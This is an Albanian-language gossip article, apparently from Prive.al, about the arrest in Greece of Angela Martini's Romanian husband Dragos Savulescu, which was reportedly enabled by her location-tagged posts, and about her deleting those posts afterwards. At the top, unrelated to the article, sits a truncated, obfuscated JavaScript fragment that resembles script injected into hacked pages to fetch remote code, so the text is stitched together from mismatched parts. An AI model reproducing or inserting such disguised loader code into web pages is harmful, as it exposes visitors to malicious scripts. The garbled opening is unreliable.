;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Pas arrestimit të burrit në pushime, Angela merr këtë vendim

By

Për Dragos Savulescun përfundoi liria.

Bashkëshorti rumun i Angela Martinit u kap në Greqi nga autoritetet të cialt kanë nisur procedurat e ekstradimit drejt Rumanisë.

Ai ishte në kërkim ndërkombëtar për një dëm me shifra prej miliona eurove shkaktuar shtetit rumun, por me një vendim tërësisht paradoksal, ai mundi të qëndrojë i lirë në Itali, sepse një gjykatë në Napoli refuzoi ekstradimin.

Por, pushimet i kanë kushtuar kësaj radhe.

Mediat në Greqi raportuan se shkas për arrestimin e tij u bënë postimet e Angelas që në kohë reale se ajo ndodhej bashkë me burrin e saj dhe miq të familjes në Greqi.

Me sa duket për ti bërë qefin gruas së tij të bukur, ai ka zgjedhur të riskojë duke kaluar disa ditë pushimi në Mykonos gjë që ka rezultuar fatale për të. Portali rumun G4Media.ro ka publikuar edhe foton që mendohet se është bërë shkak për pikasjen nga policia ku bashkeshorti i Martinit që pozon në plan të parë duket në sfond.

Intervenimi i forcave të policisë greke ka qenë i ashpër duke lënë një shije të hidhur jo vetëm për rrethin e Dragos por edhe për të pranishmit që kanë parë ngjarjen.

E mesa duket, Angela është ‘mbushur mend vonë’.

Çfarë ka bërë ajo?

Bukuroshja shqiptare ka vendosur që të fshijë lokacionet nga të gjitha fotografitë e saj të postuara, e madje i ka hequr të gjitha postimet në “story” duke zgjedhur që të mos hedhë më asgjë.

Prive e ka kontaktuar Martinin për koment mirëpo ajo ka qenë e paqasshme sepse ‘zhdukja’ nga rrjetet sociale ka qenë vendimi i saj.

Në këtë periudhë të vështirë, bukuroshja shkodrane e ka zgjedhur heshtjen totale pas një aktivizimi në rrjete sociale që i kushtoi bashkëshortit të saj me lokalizim nga organet policore greke. /Prive.al

Artikuj të ngjashëm